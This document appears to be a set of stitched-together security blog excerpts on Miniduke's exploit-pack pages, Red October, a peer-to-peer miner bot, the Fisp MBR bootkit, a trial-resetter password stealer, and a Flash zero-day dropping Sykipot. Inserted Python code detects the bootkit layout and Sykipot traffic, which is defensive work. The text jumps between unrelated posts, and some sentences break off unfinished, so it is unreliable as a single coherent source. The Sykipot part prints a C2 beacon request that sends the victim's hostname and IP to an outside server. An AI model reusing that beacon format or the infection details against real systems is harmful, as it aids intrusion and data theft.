Together with our partner CrySyS Lab, we've discovered two new, previously-unknown infection mechanisms for Miniduke. These new infection vectors rely on Java and IE vulnerabilities to infect the victim's PC.
While inspecting one of the C&C servers of Miniduke, we have found files that were not related to the C&C code, but seemed to be prepared for infecting visitors using web-based vulnerabilities.
The page hxxp://[c2_hostname]/groups/business-principles.html is used as the starting point for the attack. It consists of two frames: one loads a decoy web page copied from a legitimate website (http://www.albannagroup.com/business-principles.html), and the other performs the malicious activity (hxxp://[c2_hostname]/groups/sidebar.html).

Source code of business-principles.html

Decoy webpage loaded
The second web page, "sidebar.html", contains 88 lines, mostly JavaScript code, and works as a primitive exploit pack. Its code identifies the victim's browser and then serves one of two exploits. It also sends the collected browser data to another script by means of a POST request to "hxxp://[c2_hostname]/groups/count/write.php".
Earlier this week, we published our report on “Red October”, a high-level cyber-espionage campaign that during the past five years has successfully infiltrated computer networks at diplomatic, governmental and scientific research organizations.
In part one, we covered the most important parts of the campaign: the anatomy of the attack, a timeline of the attacker’s operation, the geographical distribution of the victims, sinkhole information and presented a high level overview of the C&C infrastructure.
Today we are publishing part two of our research, which comprises over 140 pages of technical analysis of the modules used in the operation.
When analyzing targeted attacks, sometimes researchers focus on the superficial system infection and how that occurred. Sometimes, that is sufficient, but in the case of Kaspersky Lab, we have higher standards. This is why our philosophy is that it’s important to analyze not just the infection, but to answer three very important questions:
According to our knowledge, never before in the history of ITSec has a cyber-espionage operation been analyzed in such deep detail, with a focus on the modules used for attack and data exfiltration. In most cases, the analysis is compromised by the lack of access to the victim’s data; the researchers see only some of the modules and do not understand the full purpose of the attack or what was stolen.
To get around these hiccups, we set up several fake victims around the world and monitored how the attackers handled them over the course of several months. This allowed us to collect hundreds of attack modules and tools. In addition to these, we identified many other modules used in other attacks, which allowed us to gain a unique insight into the attack.
Identifying a botnet is not an easy task sometimes, especially when one gets lost in different components like droppers, infectors and other bad stuff. Some two weeks ago, Jose Nazario from Arbor Networks pointed me to a new varmint that appears to be another peer-to-peer bot. When executed, the program installs tons of stuff that holds a number of goodies, for example
However, we leave these aside for now and focus on the botnet's architecture instead, which is really just a channel for pushing software to infected machines. Scrabbling about in the installed programs finally brought up the actual bot, which we detect as Trojan.Win32.Miner.h. The binary has several layers of obfuscation to make analysis harder but eventually writes a UPX-packed executable into a memory section, from which the original binary can be restored.
One of the first things that stands out is a list of 1953 hard-coded IP address strings contained in the binary. These addresses are contacted by the bot during its bootstrapping phase in order to join the peer-to-peer network.
We recently discovered a new bootkit, i.e. a malicious program which infects the hard drive’s boot sector. Kaspersky Lab detects it as Rootkit.Win32.Fisp.a. The bootkit is distributed by Trojan-Downloader.NSIS.Agent.jd. The Trojan infects the computers of users who try to download a video clip from a fake Chinese porn site.
This downloader is remarkable in that it downloads other malicious programs using an NSIS engine and stores all links in the relevant NSIS script.
Fragment of the NSIS script for Trojan-Downloader.NSIS.Agent.jd
The dropper Rootkit.Win32.Fisp.a is among the files downloaded by the Trojan-downloader. This malicious program infects the hard drive’s boot sector. More specifically, it saves the old MBR to the third sector and replaces it with its own. Starting with the fourth sector, it installs an encrypted driver and the remaining code.
Fragment from the start of the hard disk infected by Rootkit.Win32.Fisp.a
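As a worked illustration of the on-disk layout described above (an added forensic heuristic of my own, not Kaspersky's code or the bootkit's), the following Python builds a constructed disk image in which the original MBR has been parked in the third sector and an opaque payload starts in the fourth, then flags that pattern. The sample MBR bytes and payload are constructed, not taken from a real infection.

```python
import struct

SECTOR = 512
MBR_SIG = b"\x55\xaa"

def has_mbr_signature(sector):
    return len(sector) == SECTOR and sector[510:512] == MBR_SIG

def partition_table(sector):
    """The 64-byte partition table lives at offset 446 of an MBR sector."""
    return sector[446:510]

def build_clean_mbr():
    """Constructed stand-in for a normal MBR: filler boot code, one partition entry, 55AA."""
    code = b"\xfa\x33\xc0" + b"\x90" * (446 - 3)
    entry = bytes([0x80, 1, 1, 0, 0x07, 0xfe, 0xff, 0xff]) + struct.pack("<II", 2048, 1_000_000)
    return code + entry + b"\x00" * 48 + MBR_SIG

def build_fisp_like_image(clean_mbr):
    """Constructed image with the layout the post describes: attacker MBR in sector 0
    (partition table kept so the disk still boots), original MBR saved to sector 2
    (the third sector), opaque payload from sector 3 (the fourth sector) onward."""
    bad_mbr = b"\xeb\xfe" + b"\x00" * 444 + partition_table(clean_mbr) + MBR_SIG
    payload = bytes((i * 37 + 11) & 0xFF for i in range(SECTOR * 4))
    return bad_mbr + b"\x00" * SECTOR + clean_mbr + payload

def check_boot_sectors(image):
    """Heuristic only: report a second MBR parked in sector 2 whose partition table
    matches sector 0, which is how this bootkit preserves the original MBR."""
    sec0, sec2 = image[0:SECTOR], image[2 * SECTOR:3 * SECTOR]
    findings = []
    if not has_mbr_signature(sec0):
        findings.append("sector 0 lacks the 55AA boot signature")
    if (has_mbr_signature(sec2) and sec2[:446] != sec0[:446]
            and partition_table(sec2) == partition_table(sec0)):
        findings.append("sector 2 holds a second MBR with sector 0's partition table")
    return findings
```

Legitimate boot managers also use the gap between the MBR and the first partition, so a hit is an indicator to confirm against the sector 0 code, not proof of infection on its own.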
The word ‘leak’ has become rather popular in recent times, but few of us actually realize just how likely it is that our own personal information could be leaked. We protect our computers, our mobile devices, keep up to speed with the latest security issues, but there are still times when we become careless. In particular, I’m speaking about public computers like this one here:

This is a genuine public access computer I came across in a hotel I was staying at last week during a short vacation. I had to use the Internet quite urgently, and of course I understood that my personal data wasn’t completely safe and could end up in someone else’s hands. I decided to try a little experiment and the results clearly demonstrated that any of us could quite easily fall victim to our own personal ‘(Wiki)leaks’:
I’m sure very few people would want their documents, especially of this nature, falling into the hands of strangers, competitors or cybercriminals.
So, if you want to experience your own (Wiki)leaks, all you have to do is use public access computers on a regular basis at airports, in hotels, cafes, libraries etc. If you really have to use a public computer and you know a thing or two about IT security, check first of all to see if the computer is infected. Remember that antivirus scanning results don’t always reflect the real picture.
Secondly, check if the ‘save passwords’ option is activated in the browser.
Thirdly, if you are working with documents or photographs, try not to download them. Many of today’s email services allow you to work with them directly from your email account. If you do download something, don’t forget to delete it afterwards and clear it from the Recycle Bin.
It’s also worth looking at the computer itself to ensure that there are no devices between the port where the keyboard is plugged in and the keyboard itself. These devices can gather information and look something like this:

Other precautionary measures include either cleaning your Internet Activity History or, before going online, switching on the privacy mode that is included in numerous browsers these days.
I cleaned up the aforementioned computer and informed the hotel administration. I didn’t get a discount, but the hotel management was very grateful and promised that no more cybercriminals would be stealing money from their customers (although I’m not so sure about that).
On 14 January, my colleague Vyacheslav Zakorzhevsky published a blog on the dangers of using cracks and keygens.
The malware in question was primarily for stealing registration keys for popular software.
A few days ago, we found a new malicious application that disguises itself as a Kaspersky Trial Resetter (an application that can be used to reset a software evaluation period that has expired).
The new malware is detected as Trojan-PSW.MSIL.Agent.wx and only two vendors, including Kaspersky Lab, currently detect it.
The twist here is that instead of resetting your trial period, it steals information saved on the computer, be it browser-saved passwords or passwords saved by an application.
According to the PE header, the malicious software was created on 31 January 2011, although the first infection reports appeared on 6 February. One can only wonder how successful such an application can be. Read below to find out:

In 23 days, a total of 1109 computers were infected with this password-stealing Trojan, an average of 48 infections per day.
The top 5 targeted countries were:

What about the type of stolen accounts?

Among the stolen data, hundreds of website credentials were found, such as data for web hosting, online stores, internet/mobile providers, social networks (LinkedIn, Twitter, Facebook, MySpace etc.), webmail, blogs, banking, instant messaging, online gaming etc.
Here is a list of the browsers targeted by the malicious program, as well as the number of users whose data were stolen:

Kaspersky Lab contacted the hosting provider of the drop zone who closed and deleted the accounts.
I hope these statistics will convince you that downloading pirated software is not a good idea.
1109 users who thought they were downloading a crack for a security solution ended up being infected.
It’s also clear that saving your passwords within your browser isn’t the best idea.
You may want to consider using a Password Management program, such as the Kaspersky Password Manager, which keeps all your passwords encrypted and immune to these sorts of attacks.
We are currently in the process of contacting the victims and informing them about the infection.
Yesterday, Adobe published an advisory about a critical vulnerability in their Flash Player that is already being actively exploited. The CVE number assigned to this bug is CVE-2010-3654. A fix is currently being prepared by Adobe. The exploit we are seeing right now has a payload which, while not being very sophisticated, holds several surprises.
When executed, the bot checks for command line options. The '-installkys' option installs the bot onto the victim machine. Interestingly enough, if you use the '-removekys' parameter the malware gets entirely removed from the system – a built-in uninstall. The malware then calls itself without any parameters and the malicious code is run. The screenshot below shows the code for parsing the command line parameters.

The binary drops a DLL, the actual malware, to the hard drive and scans the list of running processes for outlook.exe, iexplore.exe, and firefox.exe. If a matching process is found, the dropped DLL gets injected and executed as a new thread.
The injected code will send an HTTP request to news.mysundayparty.com every 5 minutes and download an encrypted configuration file. The DNS entry seems to be somewhat fluxy: it has a TTL of 1800 seconds, and the IP address it resolves to changes every now and then. A decrypted config file contains a list of commands to gather information about the infected host. This information is encrypted and sent back to the server. Here is a decoded config file:

Searching the web for strings from this file reveals an interesting connection with a piece of malware that was spreading at the beginning of this year. Similar to the current bot, this earlier virus exploits a zero-day vulnerability, collects information about the infected machine and sends it back to its master. A still earlier version is reported to exploit another Flash zero-day.
A nice thing is that each configuration download request contains all the necessary information to track down infected hosts in a network. Below is what the HTTP GET request for the config file looks like. The path contains one parameter assembled from the Windows host name and its IP address with the suffix '-nsunday' and is quite distinctive. Also note the Referer field, which is always set to http://www.yahoo.com/, and the characteristic Accept header. Constructing a reliable IDS signature should not be too hard.
GET /asp/kys_allow_get.asp?name=getkys.kys&hostname=PC-192.168.0.1-nsunday HTTP/1.1
Referer: http://www.yahoo.com/
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7
Host: news.mysundayparty.com
Cache-Control: no-cache
Kaspersky detects both the installer and the DLL as Backdoor.Win32.Sykipot.an. The exploit is heuristically detected as Exploit.Script.Generic.
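To show what the signature suggested above looks like in practice, here is an added Python matcher (my own, not a Kaspersky or Sykipot artefact) that parses a raw HTTP request, requires the kys_allow_get.asp path plus the '-nsunday' hostname parameter, and uses the Referer, Accept and Host values only to raise a confidence score while recovering the victim's host name and IP. The sample request is constructed from the fields shown in the post, and the benign request is invented for contrast.

```python
import re
from urllib.parse import urlsplit, parse_qs
# Constructed sample modelled on the request shown in the post (not a real capture).
SAMPLE_REQUEST = (
    "GET /asp/kys_allow_get.asp?name=getkys.kys&hostname=PC-192.168.0.1-nsunday HTTP/1.1\r\n"
    "Referer: http://www.yahoo.com/\r\n"
    "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, "
    "application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\r\n"
    "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7\r\n"
    "Host: news.mysundayparty.com\r\n"
    "Cache-Control: no-cache\r\n\r\n"
)
# Constructed benign request that shares the Referer but nothing else.
BENIGN_REQUEST = "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\nReferer: http://www.yahoo.com/\r\n\r\n"

# The hostname parameter is assembled as <Windows host name>-<IP address>-nsunday.
HOSTNAME_RE = re.compile(r"^(?P<host>.+)-(?P<ip>\d{1,3}(?:\.\d{1,3}){3})-nsunday$")

def parse_request(raw):
    """Split a raw HTTP request into (method, target, {lowercased header: value})."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return method, target, headers

def match_sykipot_beacon(raw):
    """Return victim host/IP plus a confidence score if raw looks like a Sykipot config
    download, else None. Path and '-nsunday' parameter are required; headers add score."""
    method, target, headers = parse_request(raw)
    if method != "GET":
        return None
    url = urlsplit(target)
    if not url.path.endswith("/kys_allow_get.asp"):
        return None
    m = HOSTNAME_RE.match(parse_qs(url.query).get("hostname", [""])[0])
    if m is None:
        return None
    score = 1
    if headers.get("referer") == "http://www.yahoo.com/":
        score += 1
    if "application/x-shockwave-flash" in headers.get("accept", ""):
        score += 1
    if headers.get("host") == "news.mysundayparty.com":
        score += 1
    return {"victim_host": m.group("host"), "victim_ip": m.group("ip"), "score": score}
```

The recovered host name and IP are what an incident responder needs to locate the infected machine; the Host check is the weakest indicator because the C&C domain can change.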